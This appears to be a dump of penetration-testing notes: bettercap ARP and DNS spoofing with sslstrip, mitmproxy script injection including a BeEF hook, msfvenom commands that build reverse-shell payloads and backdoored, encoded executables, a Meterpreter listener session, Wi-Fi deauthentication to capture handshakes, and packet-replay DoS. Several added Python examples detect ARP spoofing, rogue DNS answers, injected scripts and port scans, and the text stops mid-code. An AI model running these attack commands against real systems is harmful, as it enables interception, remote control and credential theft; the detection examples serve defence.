26 | Inject the script on the proxy:
27 |
28 | set http.proxy.script /home/user/Desktop/myscript.py
29 | set http.proxy.sslstrip true
30 | http.proxy on
--------------------------------------------------------------------------------
/tools/mitm/ARP Spoofing & MITM Proxy.md:
--------------------------------------------------------------------------------
1 | Listen on the network:
2 |
3 | Redirect http and https traffic to port 8080:
4 |
5 | echo "1" > /proc/sys/net/ipv4/ip_forward
6 |
7 | net.probe on
8 |
9 | Activate ARP spoofing:
10 |
11 | sudo bettercap
12 | set arp.spoof.targets 10.0.2.4
13 | set arp.spoof.fullduplex true
14 | arp.spoof on
15 |
16 | Activate MITM listening:
17 |
18 | set net.sniff.verbose false
19 | net.sniff on
20 |
21 | Activate the proxy:
22 |
23 | set http.proxy.sslstrip true
24 | http.proxy on
25 |
--------------------------------------------------------------------------------
/tools/mitm/ARP Spoofing & MITM.md:
--------------------------------------------------------------------------------
1 | Listen on the network:
2 |
3 | Redirect http and https traffic to port 8080:
4 |
5 | iptables -t nat -F
6 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
7 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
8 | sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
9 | echo "1" > /proc/sys/net/ipv6/conf/all/forwarding
10 | echo "0" > /proc/sys/net/ipv4/conf/all/send_redirects
11 |
12 | Activate ARP spoofing:
13 |
14 | bettercap
15 | set arp.spoof.targets 10.0.2.4
16 | set arp.spoof.fullduplex true
17 | arp.spoof on
18 |
19 | Start the MITM listener:
20 |
21 | mitmproxy --mode transparent --listen-host 10.0.2.5 #kali ip
22 |
23 | Mitmdump & BeEF:
24 |
25 | Create and inject a Python script:
26 |
27 | nano myscript.py
28 |
29 | from mitmproxy import http
30 |
31 | def response(flow: http.HTTPFlow):
32 | reflector = b"HACKED"
33 | flow.response.content = flow.response.content.replace(b"Science", reflector)
34 |
35 | mitmdump -s myscript.py --mode transparent --listen-host 10.0.0.4 --anticache
36 |
37 | Hook the browser with BeEF:
38 |
39 | nano myscript.py
40 |
41 | from mitmproxy import http
42 |
43 | def response(flow: http.HTTPFlow):
44 | reflector = bytes("", "UTF-8")
45 | flow.response.content = flow.response.content.replace(b"", reflector)
46 |
47 | mitmdump -s myscript.py --mode transparent --listen-host 10.0.0.4 --anticache
48 |
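Both mitmproxy scripts above rewrite the HTML body while it is in flight, either replacing a word or appending a script tag. Seen from the defender's side, the same tampering shows up as a script source the page never referenced or as a body digest that no longer matches. The following is an added example, not code from this repository or from mitmproxy: a check that a synthetic-monitoring job can run on fetched pages. The page, the allowed CDN host and the injected host 198.51.100.7 (a documentation address) are all constructed for the example.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: the first-party page loads its own script plus one allowed CDN;
# the hook.js line is what an in-path proxy injection would add. 198.51.100.7 is a
# documentation address standing in for a made-up proxy host.
SAMPLE_HTML = """<html><head><title>Science news</title>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
</head><body><p>Science</p>
<script src="http://198.51.100.7:3000/hook.js"></script>
<script>console.log('inline')</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Record every <script> element: external sources and a count of inline ones."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self.inline += 1


def find_unexpected_scripts(html, page_host, allowed_hosts):
    """Return (script srcs whose host is neither the page nor an allowed host, inline count)."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}
    unexpected = []
    for src in collector.external:
        host = urlparse(src).hostname        # None for relative URLs, i.e. same origin
        if host is not None and host.lower() not in allowed:
            unexpected.append(src)
    return unexpected, collector.inline


def sha256_hex(body):
    """Digest of a response body, to compare with a baseline fetched over a trusted path."""
    return hashlib.sha256(body).hexdigest()


if __name__ == "__main__":
    print(find_unexpected_scripts(SAMPLE_HTML, "news.example.org", ["cdn.example.org"]))
```

The injected `hook.js` is reported because its host is on neither list, while the relative and CDN sources pass. In the browser itself a Content-Security-Policy `script-src` allowlist blocks the same injection, and HSTS prevents the `sslstrip` downgrade that lets the proxy read the body in the first place.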
49 | Bettercap:
50 |
51 | net.show
52 | net.probe on
53 | net.show
54 | ticker on
55 |
56 | bettercap -T 10.1.1.12
57 |
58 | https://www.kalitut.com/2019/04/how-to-install-and-use-bettercap.html
59 |
60 | https://github.com/aancw/bettercap-ng/blob/master/caplets/beef-inject.js
61 |
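The three ARP spoofing recipes above (bettercap `arp.spoof`, with or without a proxy behind it) all depend on hosts accepting unsolicited or conflicting ARP replies. On the defender's side that traffic is the signal: an IP that suddenly answers from a new MAC, or one MAC claiming both the gateway and a client, which is exactly what `arp.spoof.fullduplex` produces. The following is an added Python example, not part of this repository, that runs that check over constructed lines in the shape of `tcpdump -n -e arp` output. The MAC addresses and the gateway IP 10.0.2.1 are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of `tcpdump -n -e arp` output (made-up addresses;
# 10.0.2.1 plays the gateway, 10.0.2.4 the client, 08:00:27:cc:dd:05 the spoofer).
SAMPLE_LOG = """\
10:00:01.100 08:00:27:aa:bb:01 > 08:00:27:aa:bb:04, ethertype ARP (0x0806), length 42: Reply 10.0.2.1 is-at 08:00:27:aa:bb:01, length 28
10:00:02.200 08:00:27:aa:bb:04 > 08:00:27:aa:bb:01, ethertype ARP (0x0806), length 42: Reply 10.0.2.4 is-at 08:00:27:aa:bb:04, length 28
10:00:05.300 08:00:27:cc:dd:05 > 08:00:27:aa:bb:04, ethertype ARP (0x0806), length 42: Reply 10.0.2.1 is-at 08:00:27:cc:dd:05, length 28
10:00:05.310 08:00:27:cc:dd:05 > 08:00:27:aa:bb:01, ethertype ARP (0x0806), length 42: Reply 10.0.2.4 is-at 08:00:27:cc:dd:05, length 28
10:00:06.300 08:00:27:cc:dd:05 > 08:00:27:aa:bb:04, ethertype ARP (0x0806), length 42: Reply 10.0.2.1 is-at 08:00:27:cc:dd:05, length 28
10:00:07.000 08:00:27:aa:bb:04 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 10.0.2.1 tell 10.0.2.4, length 28
"""

GATEWAY_IP = "10.0.2.1"  # assumed gateway address of the sample network

# Only "Reply <ip> is-at <mac>" lines carry an IP-to-MAC binding; requests are ignored.
REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s.*\bReply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_replies(log_text):
    """Return (timestamp, ip, mac) for every ARP reply line in the text."""
    replies = []
    for line in log_text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            replies.append((m["ts"], m["ip"], m["mac"].lower()))
    return replies


def detect_arp_spoofing(replies, gateway_ip=GATEWAY_IP, multi_ip_threshold=2):
    """Flag IP->MAC changes and one MAC claiming several IPs (full-duplex spoofing)."""
    ip_to_mac = {}                 # last MAC seen answering for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    flagged_macs = set()
    alerts = []                    # (timestamp, severity, message)
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            severity = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append((ts, severity, f"{ip} moved from {previous} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) >= multi_ip_threshold and mac not in flagged_macs:
            flagged_macs.add(mac)
            claimed = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append((ts, "HIGH", f"{mac} claims {len(mac_to_ips[mac])} IPs ({claimed})"))
    return alerts


if __name__ == "__main__":
    for ts, severity, message in detect_arp_spoofing(parse_arp_replies(SAMPLE_LOG)):
        print(ts, severity, message)
```

On the sample the gateway moving to a new MAC is reported first, then the client, then the spoofer MAC holding both bindings. Legitimate gateway failover (VRRP/HSRP) also moves a MAC, so seed `ip_to_mac` from an inventory before trusting the HIGH alerts; on managed switches Dynamic ARP Inspection stops the spoofed replies at the port instead of just logging them.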
--------------------------------------------------------------------------------
/tools/mitm/DNS Spoofing & MITM.md:
--------------------------------------------------------------------------------
1 | Perform ARP spoofing attack:
2 |
3 | echo 1 > /proc/sys/net/ipv4/ip_forward
4 |
5 | set arp.spoof.targets 192.168.5.99
6 |
7 | Perform DNS spoofing attack:
8 |
9 | set dns.spoof.domains 2fa.tavanoapps.com
10 | set dns.spoof.all true
11 | dns.spoof on
12 |
13 | Activate the web server:
14 |
15 | set http.server.path /var/www/html
16 | http.server on
17 |
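With `dns.spoof.all true` every name a client asks for is answered with the attacker's own LAN address, and `http.server` then serves the page for it. From a resolver log the pattern is unmistakable: public hostnames resolving into RFC 1918 space, and one private address answering for many unrelated names. The following is an added Python example, not part of this repository, that audits constructed (name, answer) pairs for both signs. The internal-zone suffixes, the 192.168.5.x addresses and 203.0.113.10 (a documentation address standing in for a public host) are assumptions for the example.

```python
import ipaddress
from collections import defaultdict

# Ranges where a LAN host normally lives. A public hostname resolving here is the
# signature of a locally spoofed answer. Python's is_private also covers documentation
# ranges such as 203.0.113.0/24, which would hide the public sample below, so the
# list is explicit.
LAN_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]

# Zones where private answers are legitimate (assumed for the example).
INTERNAL_ZONES = (".local", ".corp", ".internal")

# Constructed (name, answer) pairs as a resolver log would show them. 192.168.5.10
# plays the LAN address that a spoofing resolver returns for every name.
SAMPLE_ANSWERS = [
    ("www.example.com", "203.0.113.10"),
    ("2fa.tavanoapps.com", "192.168.5.10"),
    ("mail.example.net", "192.168.5.10"),
    ("cdn.example.org", "192.168.5.10"),
    ("printer.corp.local", "192.168.5.20"),
]


def is_lan_address(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETWORKS)


def is_internal_name(qname):
    return qname.lower().endswith(INTERNAL_ZONES)


def audit_dns_answers(answers, sinkhole_threshold=3):
    """Return public names answered with LAN addresses, and LAN addresses that
    answer for at least `sinkhole_threshold` different public names."""
    private_answers = []
    names_per_ip = defaultdict(list)
    for qname, ip in answers:
        if is_internal_name(qname):
            continue                      # internal zones are expected to be private
        if is_lan_address(ip):
            private_answers.append((qname, ip))
            names_per_ip[ip].append(qname)
    sinkholes = {ip: names for ip, names in names_per_ip.items()
                 if len(names) >= sinkhole_threshold}
    return {"private_answers": private_answers, "sinkholes": sinkholes}


if __name__ == "__main__":
    for key, value in audit_dns_answers(SAMPLE_ANSWERS).items():
        print(key, value)
```

The printer in `.corp.local` is skipped, the three public names answered from 192.168.5.10 are listed, and that address is reported as a sinkhole. The structural fix is a validating resolver the clients actually reach (DNSSEC, or DNS over TLS/HTTPS to a trusted upstream), which the local spoofed answer cannot satisfy.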
--------------------------------------------------------------------------------
/tools/msfvenom.md:
--------------------------------------------------------------------------------
1 | # MSFVenom
2 |
3 | MsfVenom is Metasploit's standalone payload generator, the replacement for msfpayload and msfencode.
4 |
5 | ## Creating Binaries
6 |
7 | Creates a simple TCP Payload for Windows
8 |
9 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
10 |
11 | Creates a simple HTTP Payload for Windows
12 |
13 | msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
14 |
15 | Creates a simple TCP Shell for Linux
16 |
17 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
18 |
19 | Creates a simple TCP Shell for Mac
20 |
21 | msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho
22 |
23 | Creates a simple TCP Payload for Android
24 |
25 | msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk
26 |
27 | ## Web Payloads
28 |
29 | Creates a Simple TCP Shell for PHP
30 |
31 | msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
32 |
33 | Creates a Simple TCP Shell for ASP
34 |
35 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
36 |
37 | Creates a Simple TCP Shell for JSP
38 |
39 | msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp
40 |
41 | Creates a Simple TCP Shell for WAR
42 |
43 | msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war
44 |
45 |
46 | ## Windows Payloads
47 |
48 | Lists all available encoders
49 |
50 | msfvenom -l encoders
51 |
52 | Binds an exe with a Payload (Backdoors an exe)
53 |
54 | msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
55 |
56 | Creates a simple TCP payload with shikata_ga_nai encoder
57 |
58 | msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe
59 |
60 | Binds an exe with a Payload and encodes it
61 |
62 | msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe > example.exe
63 |
64 | ## Getting a Meterpreter Shell
65 | ```
66 | omar@ares:~$ sudo msfconsole
67 | msf > use exploit/multi/handler
68 | msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
69 | payload => windows/meterpreter/reverse_tcp
70 | msf exploit(multi/handler) > set lhost 192.168.1.123
71 | lhost => 192.168.1.123
72 | msf exploit(multi/handler) > set lport 4444
73 | lport => 4444
74 | msf exploit(multi/handler) > run
75 | ```
76 |
--------------------------------------------------------------------------------
/tools/network_scan/netdiscover.md:
--------------------------------------------------------------------------------
1 | Scan:
2 |
3 | netdiscover -i wlan0
4 |
5 | netdiscover -S -i wlan0
6 |
--------------------------------------------------------------------------------
/tools/network_scan/openvas.md:
--------------------------------------------------------------------------------
1 | Vulnerability scanning is a crucial phase of a penetration test and having an updated vulnerability scanner in your security toolkit can often make a real difference by helping you discover overlooked vulnerable items. For this reason, we’ve manually packaged the latest and newly released OpenVAS 8.0 tool and libraries for Kali Linux. Although nothing major has changed in this release in terms of running the vulnerability scanner, we wanted to give a quick overview on how to get it up and running.
2 |
3 | # apt-get update
4 | # apt-get dist-upgrade
5 |
6 | # apt-get install openvas
7 | # openvas-setup
8 | # openvas-start
9 |
10 | To change the web login:
11 |
12 | openvasmd --create-user NEWUSER
13 |
14 | It will automatically generate a password for the new user.
15 |
16 | Use this new account to modify the admin password.
17 |
18 | To remove the 'junk / false' account just enter
19 |
20 | openvasmd --delete-user=NEWUSER
21 |
22 | or do so in the WebUI.
23 |
24 | https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/
25 | http://serverfault.com/questions/563815/reset-admin-password-of-openvas
--------------------------------------------------------------------------------
/tools/python.md:
--------------------------------------------------------------------------------
1 | Network Programming Basics (Python)
2 |
3 |
4 | To use the socket module
5 |
6 | import socket
7 |
8 | To create a new socket object
9 |
10 | sock = socket.socket()
11 |
12 | To get your local machine's name
13 |
14 | host = socket.gethostname()
15 |
16 | To declare a port for your service
17 |
18 | port = 80
19 |
20 | To bind a (hostname, port number) pair to a socket (the pair is passed as one tuple)
21 |
22 | sock.bind((host, port))
23 |
24 | To set up and start a TCP listener (wait for client connection)
25 |
26 | sock.listen()
27 |
28 | To accept a connection
29 |
30 | Note: accept() returns a (conn, address) pair where conn is a new socket object that can be used to send/receive
31 | data on the connection. Address refers to the address bound on the other end of the connection.
32 |
33 | connection, address = sock.accept()
34 |
35 | To transmit a TCP message (continuing from previous example; the data must be bytes, and sendall() keeps writing until everything is sent)
36 |
37 | connection.sendall(b'Message goes here')
38 |
39 | To transmit a UDP message
40 |
41 | Note: use a UDP socket (udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) that is not connected to a remote socket, because we specify the destination address on each call
42 |
43 | udp_sock.sendto(b'Message goes here', destination_address)
44 |
45 | To close the connection
46 |
47 | connection.close()
48 |
49 | To receive TCP data from a socket (assuming s is the socket on the client side). 1024 is the maximum number of bytes returned by one call and data is a bytes object; it may be shorter than the message, so loop until you have everything.
50 |
51 | data = s.recv(1024)
52 |
53 | To receive UDP data from a socket
54 |
55 | Note: recvfrom(bufsize) returns a (bytes, address) pair, where bytes is the data received and address represents the address of the socket from which the message was sent.
56 |
57 | data, addr = s.recvfrom(1024)
58 |
59 | To get a remote address that a socket is connected to
60 |
61 | sock.getpeername()
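The snippets above are the individual calls; the following is an added example, not part of this repository, that joins them into a working TCP echo exchange and a UDP exchange on the loopback interface. It shows the three things the one-liners hide: `bind` takes a single tuple, the payload must be bytes, and TCP delivers a stream, so the receiver loops until the peer closes its side. The port is ephemeral (bound to 0) and the 5 second timeout is an assumption chosen so a misbehaving peer cannot hang the caller.

```python
import socket
import threading

HOST = "127.0.0.1"   # loopback only; the listener is never exposed on a real interface
TIMEOUT = 5.0        # assumed timeout so a silent peer cannot block forever


def recv_until_closed(sock):
    """TCP is a byte stream: one recv() is not one message, so read until the peer
    shuts down its sending side (recv returns b'')."""
    chunks = []
    while True:
        data = sock.recv(1024)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


def tcp_roundtrip(message):
    """Start a one-shot echo server on an ephemeral port, send `message`, return the echo."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.settimeout(TIMEOUT)
    server.bind((HOST, 0))                 # one tuple argument; bind(host, port) is a TypeError
    server.listen(1)
    port = server.getsockname()[1]

    def serve_one():
        conn, peer = server.accept()        # new socket for this client
        with conn:
            conn.settimeout(TIMEOUT)
            conn.sendall(recv_until_closed(conn))   # sendall, not send: send may write partially

    worker = threading.Thread(target=serve_one, daemon=True)
    worker.start()
    try:
        with socket.create_connection((HOST, port), timeout=TIMEOUT) as client:
            client.sendall(message)             # bytes, not str
            client.shutdown(socket.SHUT_WR)     # tell the server we are done sending
            return recv_until_closed(client)
    finally:
        worker.join(TIMEOUT)
        server.close()


def udp_roundtrip(message):
    """Send one datagram to a loopback UDP responder; return (reply, responder_ip)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.settimeout(TIMEOUT)
    server.bind((HOST, 0))
    port = server.getsockname()[1]

    def respond_once():
        data, peer = server.recvfrom(1024)      # bufsize is required; returns (bytes, address)
        server.sendto(data.upper(), peer)       # unconnected socket: destination given per call

    worker = threading.Thread(target=respond_once, daemon=True)
    worker.start()
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(TIMEOUT)
    try:
        client.sendto(message, (HOST, port))
        reply, peer = client.recvfrom(1024)
        return reply, peer[0]
    finally:
        client.close()
        worker.join(TIMEOUT)
        server.close()


if __name__ == "__main__":
    print(tcp_roundtrip(b"hello over tcp"))
    print(udp_roundtrip(b"hello over udp"))
```

Sending 5000 bytes through `tcp_roundtrip` works because both sides loop; a single `recv(1024)` would have returned only the first chunk.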
62 |
63 |
64 |
65 |
--------------------------------------------------------------------------------
/tools/tcpdump.md:
--------------------------------------------------------------------------------
1 | # Useful `tcpdump` commands
2 |
3 | ### TCPDUMP Cheat Sheet
4 | * [TCPDUMP Cheat Sheet](http://packetlife.net/media/library/12/tcpdump.pdf) is a good resource (I also have a local copy in this repository)
5 |
6 | ### TCP traffic on port 80-88
7 | `tcpdump -nvvX -s0 -i eth0 tcp portrange 80-88`
8 |
9 | ### Capturing traffic to specific IP address excluding specific subnet
10 | `tcpdump -i eth0 -tttt dst <ip> and not net 10.10.10.0/24`
11 |
12 | ### Capturing traffic for a specific host
13 | `tcpdump host 10.1.1.1`
14 |
15 | ### Capturing traffic for a specific subnet
16 | `tcpdump net 10.1.1`
17 |
18 | ### Capturing traffic for a given duration in seconds
19 | `dumpcap -i eth0 -a duration:<seconds> -w myfile.pcap`
20 |
21 | ### Replaying a PCAP
22 | `file2cable -i eth0 -f file.pcap`
23 |
24 | ### Replaying packets (to fuzz/DoS)
25 | `tcpreplay --topspeed --loop=0 --intf=eth0 pcap_file_to_replay` (use `--mbps=10|100|1000` instead of `--topspeed` to rate-limit)
26 |
27 |
28 | -------
29 |
30 | # alex
31 |
32 | ###############
33 | # Basic Usage #
34 | ###############
35 |
36 | #Capture packets on a particular interface (eth0)
37 | #Note that tcpdump (without the '-i eth0') is also valid if you are only using one interface
38 | tcpdump -i eth0
39 |
40 | #Capture packets with more detailed output
41 | tcpdump -i eth0 -nnvvS
42 |
43 | #Display captured packets in both HEX and ASCII format
44 | tcpdump -XX -i eth0
45 |
46 | #Write captured packets into a file (can be read by tools such as Wireshark, Snort, etc)
47 | tcpdump -w yourfilename.pcap -i eth0
48 |
49 | #Read packets from a saved packet capture file
50 | tcpdump -tttt -r yoursavedfile.pcap
51 |
52 | #Display IP addresses instead of hostnames when capturing packets
53 | tcpdump -n -i eth0
54 |
55 | #Capture packets from a particular source/destination IP address
56 | tcpdump src 192.168.1.1
57 | tcpdump dst 192.168.1.1
58 |
59 | #Capture packets from a particular source/destination port number
60 | tcpdump src port 53
61 | tcpdump dst port 21
62 |
63 | #Capture an entire network's traffic using CIDR notation
64 | tcpdump net 192.168.1.0/24
65 |
66 | #Capture traffic to or from a port
67 | tcpdump port 3389
68 |
69 | #Display captured packets above or below a certain size (in bytes)
70 | tcpdump less 64
71 | tcpdump greater 256
72 |
73 |
74 | ##################
75 | # Advanced Usage #
76 | ##################
77 |
78 | #More complex statements can be formed with the use of logical operators: and(&&), or(||), not(!)
79 | #Examples:
80 |
81 | #Capture all traffic from 192.168.1.10 with destination port 80 (with verbose output)
82 | tcpdump -nnvvS src 192.168.1.10 and dst port 80
83 |
84 | #Capture traffic originating from the 172.16.0.0/16 network with destination network 192.168.1.0/24 or 10.0.0.0/8
85 | tcpdump 'src net 172.16.0.0/16 and (dst net 192.168.1.0/24 or 10.0.0.0/8)'
86 |
87 | #Capture all traffic originating from host H1 that isn't going to port 53
88 | tcpdump src H1 and not dst port 53
89 |
90 | #With some complex queries you may have to use single quotes to ignore special characters, namely parentheses
91 | #Capture traffic from 192.168.1.1 that is destined for ports 80 and 21
92 | tcpdump 'src 192.168.1.1 and (dst port 80 or 21)'
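The filters above select traffic; what to do with the lines is the other half. The following is an added Python example, not part of this repository, that parses constructed `tcpdump -nn` TCP lines and applies one common detection on top of them: a source sending bare SYNs (no ACK) to many distinct ports on one host, the shape of a port scan. The addresses, ports and the threshold of five ports are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed lines in the shape of `tcpdump -nn` TCP output; all addresses are made up.
# 192.168.1.10 probes six ports on .20 in a row, 192.168.1.30 opens one normal connection.
SAMPLE_TCPDUMP = """\
10:00:01.000001 IP 192.168.1.10.51234 > 192.168.1.20.22: Flags [S], seq 100, win 64240, length 0
10:00:01.000102 IP 192.168.1.10.51235 > 192.168.1.20.80: Flags [S], seq 101, win 64240, length 0
10:00:01.000203 IP 192.168.1.10.51236 > 192.168.1.20.443: Flags [S], seq 102, win 64240, length 0
10:00:01.000304 IP 192.168.1.10.51237 > 192.168.1.20.3389: Flags [S], seq 103, win 64240, length 0
10:00:01.000405 IP 192.168.1.10.51238 > 192.168.1.20.8080: Flags [S], seq 104, win 64240, length 0
10:00:01.000506 IP 192.168.1.10.51239 > 192.168.1.20.21: Flags [S], seq 105, win 64240, length 0
10:00:02.000000 IP 192.168.1.20.22 > 192.168.1.10.51234: Flags [S.], seq 200, ack 101, win 65160, length 0
10:00:03.000000 IP 192.168.1.30.40000 > 192.168.1.20.443: Flags [S], seq 300, win 64240, length 0
10:00:03.500000 IP 192.168.1.30.40000 > 192.168.1.20.443: Flags [.], ack 1, win 501, length 0
"""

# timestamp, src.port > dst.port: Flags [..]  (the -nn form: no name resolution)
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d{1,3}(?:\.\d{1,3}){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse_tcpdump(text):
    """Return dicts with ts/src/sport/dst/dport/flags for each TCP line that parses."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["sport"] = int(rec["sport"])
            rec["dport"] = int(rec["dport"])
            packets.append(rec)
    return packets


def find_port_scans(packets, min_ports=5):
    """Sources that sent bare SYNs to at least `min_ports` distinct ports on one host."""
    syn_ports = defaultdict(set)                 # (src, dst) -> {dport}
    for p in packets:
        if p["flags"] == "S":                    # "S." is the SYN-ACK reply, not a probe
            syn_ports[(p["src"], p["dst"])].add(p["dport"])
    return sorted((src, dst, len(ports))
                  for (src, dst), ports in syn_ports.items()
                  if len(ports) >= min_ports)


if __name__ == "__main__":
    for src, dst, n in find_port_scans(parse_tcpdump(SAMPLE_TCPDUMP)):
        print(f"{src} sent SYNs to {n} distinct ports on {dst}")
```

To feed it live data, capture only the probes with the equivalent BPF filter, `tcpdump -nn 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'`, and pipe the output in; the regex above is deliberately strict, so lines from other protocols are dropped rather than misread.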
--------------------------------------------------------------------------------
/tools/web/web_vulnerabilities.md:
--------------------------------------------------------------------------------
1 | ## Mantra browser:
2 |
3 | Mantra is a Firefox-based browser bundled with many plugins used to perform penetration tests.
4 |
5 | ## OWASP:
6 |
7 | OWASP ZAP is a proxy like Burp. It has a spider feature (not in the Burp free version).
8 |
9 | Used to scan websites and search for vulnerabilities and injections.
10 |
11 | ## BURP:
12 |
13 | Burp is a proxy for website analysis; it can perform brute-force attacks, modify requests, etc.
14 |
15 | Burp starts its proxy on port 8080.
16 | Configure this proxy in the browser.
17 |
18 | ## Nikto:
19 |
20 | Searches for web vulnerabilities on a server.
21 |
22 | nikto -h 10.1.1.12 (default)
--------------------------------------------------------------------------------
/tools/wireshark.md:
--------------------------------------------------------------------------------
1 | Basic:
2 |
3 | 1) Try to get EAPOL packets; these packets contain the handshakes.
4 |
5 | We can change the scanned channel if needed (add the Wi-Fi toolbar to change it easily).
6 |
7 | 2) If you have the handshakes, go to Preferences > Protocols > IEEE 802.11 and add the WPA-PSK key in order to decrypt all the traffic of every client on that network.
8 |
9 | 3) Look for DNS requests and watch all the traffic from computers and smartphones.
10 |
11 | Open Statistics > Resolved Addresses to show all the DNS resolutions.
12 |
13 | 4) Search for HTTP requests (including POST) and examine the packets to find credentials, conversations, etc.
14 |
15 | - http.host == "192.168.0.110:8080"
16 |
17 | Sniffing the network:
18 |
19 | airmon-ng start wlan0
20 | airodump-ng wlan0mon
21 |
22 | Start Wireshark on wlan0mon and capture handshakes with one of these two commands:
23 |
24 | aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon
25 | mdk3 wlan0mon
26 |
27 | Search in Wireshark for deauthentication packets and EAPOL packets, then continue with the "Basic" capture process explained above.
28 |
--------------------------------------------------------------------------------
/tools/wordlists/cewl.md:
--------------------------------------------------------------------------------
1 | # CEWL
2 |
3 | Create wordlists from website:
4 |
5 | cewl.rb https://www.website.com -w file.txt
6 |
7 | cewl http://netsec.ws/ -d 1 -m 6 -w netsec.txt
8 |
9 | -d: link depth to spider
10 | -m: minimum word length
11 |
12 | To spider a site and write all found words to a file
13 |
14 | cewl -w
15 |
16 | To spider a site and follow links to other sites
17 |
18 | cewl -o
19 |
20 | To spider a site using a given user-agent
21 |
22 | cewl -u
23 |
24 | To spider a site for a given depth and minimum word length
25 |
26 | cewl -d -m
27 |
28 | To spider a site and include a count for each word
29 |
30 | cewl -c
31 |
32 | To spider a site including metadata and write the metadata words to a separate file
33 |
34 | cewl -a --meta_file
35 |
36 | To spider a site and store email addresses in a separate file
37 |
38 | cewl -e --email_file
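What cewl does with `-m` and `-c` is extract the visible words of a page and count them. The defensive use of the same list is a password-policy check: a password built from words that appear on the organisation's own public site is exactly what a site-derived wordlist hits first. The following is an added Python example, not cewl's code and not part of this repository, that implements the extraction over a constructed page for a fictional company and checks candidate passwords against the result. The page text, the minimum word length of 6 and the word pattern are assumptions for the example.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed page for a fictional company; nothing here is scraped from a real site.
SAMPLE_HTML = """<html><head><title>Acme Robotics - Welcome</title>
<script>var tracking = "ignored-by-the-extractor";</script>
<style>.hero { color: red }</style></head>
<body><h1>Acme Robotics</h1>
<p>Acme builds the Falcon and Sparrow robot lines in Rotterdam since 1998.</p>
<p>Our Falcon series won the Rotterdam innovation award.</p>
</body></html>"""


class TextExtractor(HTMLParser):
    """Collect visible text only, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
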